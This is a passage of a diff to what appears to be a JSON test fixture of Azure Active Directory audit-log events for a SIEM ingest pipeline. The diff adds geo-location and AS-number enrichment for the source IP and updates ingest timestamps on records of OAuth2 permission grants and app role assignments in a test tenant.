Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -10764,6 +11436,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -10930,7 +11614,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125169100Z", + "ingested": "2021-12-14T14:48:43.176718076Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -10957,6 +11641,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -11123,7 +11819,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125175700Z", + "ingested": "2021-12-14T14:48:43.176718821Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -11150,6 +11846,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -11316,7 +12024,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125181300Z", + "ingested": "2021-12-14T14:48:43.176719679Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -11343,6 +12051,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -11509,7 +12229,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125185500Z", + "ingested": "2021-12-14T14:48:43.176720353Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
